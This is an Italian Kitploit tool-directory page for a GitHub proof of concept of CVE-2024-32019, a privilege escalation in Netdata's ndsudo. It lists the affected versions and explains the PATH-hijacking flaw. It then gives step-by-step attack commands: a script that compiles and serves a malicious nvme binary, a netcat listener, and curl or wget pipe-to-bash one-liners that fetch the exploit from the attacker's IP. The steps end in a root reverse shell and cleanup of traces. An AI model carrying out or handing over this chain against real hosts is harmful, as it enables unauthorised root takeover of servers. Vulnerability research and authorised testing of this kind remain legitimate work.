Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-32019-PoC — Script Bash per l'Escalation dei privilegi tramite "ndsudo" (Netdata Local Exploit) | Kitploit
Strumenti/GitHubGitHub/80ottanta80/cve-2024-32019-poc
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitPenetration TestingApprendimento e FormazioneLab e Pratica
GitHub80ottanta80/cve-2024-32019-poc

CVE-2024-32019-PoC

Script Bash per l'Escalation dei privilegi tramite "ndsudo" (Netdata Local Exploit)

Vedi Repository
9 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-32019-PoC

Script Bash per Privilege Escalation tramite "ndsudo" (Exploit Locale Netdata)

Versioni Affette di Netdata

  • >= v1.45.0, < v1.45.3

  • >= v1.44.0-60, < v1.45.0-169

Descrizione della Vulnerabilità

Lo strumento "ndsudo" esegue un insieme ristretto di comandi esterni, ma i percorsi di ricerca sono forniti dalle variabili d'ambiente "PATH". Modificando la variabile d'ambiente "PATH" in un percorso a cui abbiamo accesso, possiamo controllare dove ndsudo cerca i comandi e crearne uno che contenga codice malevolo.

Prova di Concetto

Questo exploit si basa sul presupposto che la macchina target e la macchina attaccante siano sulla stessa rete.

Prerequisiti

Macchina Attaccante

  • Listener sulla porta 4444
  • Server web che ospita il binario nvme malevolo

Macchina Target:

  • Accesso locale alla shell
  • Permesso di eseguire ndsudo
  • wget/curl/qualsiasi client HTTP per il download del payload

Utilizzo

Sulla Macchina Attaccante

Possiamo generare e distribuire automaticamente il file necessario per l'attacco eseguendo lo script "setup_exploit_server.sh"

root@kitploit:~
$ ./setup_exploit_server.sh YOUR_IP

--------- Exploit Infrastructure Setup by Ottanta ---------

[+] Using server IP: YOUR_IP
[+] Creating exploit directory: /tmp/exploit
[+] Creating ndsudo_pe.sh script file...
[+] Creating nvme.c exploit file...
[+] Compiling nvme binary...
[+] nvme binary compiled successfully
[+] Starting web server on port 80...
[+] Web server started with PID: 9350
[+] nvme binary is available at: http://YOUR_IP/nvme
[!] Now run the privilege escalation exploit in the victim terminal
[!] Make sure to start listener: nc -nlvp 4444

Press Enter to stop the web server and clean up...

Questo script creerà tutti i file necessari per l'attacco configurati con il tuo indirizzo IP.

Dopo aver distribuito il nostro server web, avviamo un listener su un'altra shell:

root@kitploit:~
# We start a listener with Netcat, but you can use anything else
$ nc -nlvp 4444
listening on [any] 4444 ...

Sulla Macchina Target

A seconda del nostro client HTTP, possiamo scaricare ed eseguire il nostro exploit.

root@kitploit:~
# If we have curl
$ curl -L http://YOUR_IP/ndsudo_pe.sh | bash -s -- YOUR_IP

# If we have wget
$ wget -qO- http://YOUR_IP/ndsudo_pe.sh | bash -s -- YOUR_IP

Se tutto è stato fatto correttamente, ora dovremmo avere una shell di root.

alt text

Flusso dell'Exploit

  1. Scarica il binario malevolo in /tmp/exploit/
  2. Modifica il PATH per dare priorità alla directory controllata
  3. Esegue ndsudo nvme-list che esegue il binario malevolo
  4. Stabilisce una reverse shell verso la macchina attaccante
  5. Pulisce le tracce

Riferimenti

  • https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93
  • https://nvd.nist.gov/vuln/detail/CVE-2024-32019

Disclaimer Legale

Questa prova di concetto è solo per scopi educativi e di test autorizzati.

L'uso non autorizzato contro sistemi che non possiedi o per i quali non hai esplicito permesso di test è illegale.

Gli autori non sono responsabili per qualsiasi uso improprio di queste informazioni.

Scarica lo strumento